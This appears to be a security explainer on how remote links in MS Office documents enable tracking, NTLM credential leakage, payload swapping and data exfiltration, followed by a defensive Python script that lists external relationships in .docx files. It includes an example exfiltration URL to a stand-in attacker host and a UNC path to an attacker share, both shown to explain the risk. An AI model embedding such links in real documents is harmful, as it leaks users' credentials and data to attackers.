Do you know how remote links behave in MS Office?

Do we have to worry about remote content loading automatically in MS Office applications (MS Word, MS Excel, MS PowerPoint, MS Outlook)?

You think you know all about the topic? Just read on.


Yes, it is very important to understand how remote links behave in MS Office, and this is exactly why Microsoft is conservative by default.

If remote content were downloaded automatically, the security and privacy impact could be immediate. This is not hypothetical; we have seen it many times in real attacks and real incidents.

On the other hand, we know how people behave and how easily they click away every security prompt that stands between them and the content they "want".


Why remote content in MS Office is a security issue

If MS Word (or other MS Office apps) automatically fetched remote content (images, templates, OLE objects, data connections), an attacker would gain capabilities similar to active code, without using macros.

Automatic remote downloads would enable:

1. Silent tracking & deanonymization

A remote image request reveals:

  • user IP address,
  • timestamp (open time),
  • OS / Office version (via headers),
  • corporate network presence,
  • sometimes username or machine name (via proxies).

This allows:

  • confirmation that a target opened the document,
  • correlation of identities,
  • surveillance of internal users.

This is already considered dangerous in email clients, which is why MS Outlook blocks remote images by default.


2. Credential leakage (NTLM / Kerberos)

If MS Office automatically accesses:

  • \\attacker-server\share\image.png
  • or certain WebDAV/UNC paths,

MS Windows may attempt NTLM authentication, leaking:

  • NTLM hashes,
  • domain information.

This can lead to:

  • credential relay,
  • lateral movement,
  • domain compromise.

This class of issue is extremely well-documented.


3. Malware delivery without macros

Remote content allows:

  • payload swapping after delivery,
  • time-based or geo-based attacks,
  • AV evasion (content changes post-scan).

Attack chain example:

  1. user receives harmless-looking .docx,
  2. days later, attacker replaces the remote image with:
    • a malformed image exploiting a parser bug,
    • or a weaponized OLE object,
  3. opening the document triggers exploitation.

This bypasses:

  • macro protections,
  • email gateway scanning,
  • static AV analysis.

4. Bypassing “no-macros” policies

Many organizations:

  • block macros entirely,
  • still allow .docx documents.

Remote content would allow:

  • logic, staging, and control without macros,
  • a “living off the document” technique.

This is one reason attackers historically abused:

  • linked templates,
  • DDE,
  • OLE links,
  • external data connections.

5. Data exfiltration

Documents can encode:

  • user data,
  • system information,
  • document contents,

into URLs like:

https://attacker.com/log?u={USERNAME}&d={DOCID}

Automatic requests = covert exfiltration channel.
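
A defender-side check for the remote references described above (remote images, UNC paths, linked templates), as an added example that is not part of the original article: in a .docx, such references are stored as relationships marked TargetMode="External" inside the package's .rels parts, so they can be listed without opening the file in Word. The host names and the sample package below are constructed for illustration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OD = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

def classify(target):
    """Label the target so UNC/file paths (NTLM exposure) stand out from HTTP."""
    t = target.lower()
    if t.startswith(("\\\\", "file:")):
        return "unc"
    if t.startswith(("http://", "https://")):
        return "http"
    return "other"

def find_external_links(docx_bytes):
    """Return (part, relationship kind, target, class) for each external relationship."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode", "").lower() != "external":
                    continue  # embedded part, nothing is fetched remotely
                kind = rel.get("Type", "").rsplit("/", 1)[-1]
                target = rel.get("Target", "")
                findings.append((name, kind, target, classify(target)))
    return findings

def build_sample():
    """Constructed sample: a zip holding only the relationship parts of a .docx."""
    head = '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    doc_rels = head + (
        f'<Relationship Id="rId1" Type="{OD}image" Target="media/logo.png"/>'
        f'<Relationship Id="rId2" Type="{OD}image" TargetMode="External" Target="https://tracker.example/pixel.png"/>'
        f'<Relationship Id="rId3" Type="{OD}image" TargetMode="External" Target="\\\\files.example\\share\\image.png"/>'
    ) + '</Relationships>'
    settings_rels = head + f'<Relationship Id="rId1" Type="{OD}attachedTemplate" TargetMode="External" Target="https://templates.example/base.dotm"/>' + '</Relationships>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/_rels/document.xml.rels", doc_rels)
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()

if __name__ == "__main__":
    for part, kind, target, cls in find_external_links(build_sample()):
        print(f"{cls:5} {kind:17} {part}: {target}")
```

When scanning files from untrusted senders, swap the standard-library XML parser for a hardened one such as defusedxml and cap the size of each part read from the archive.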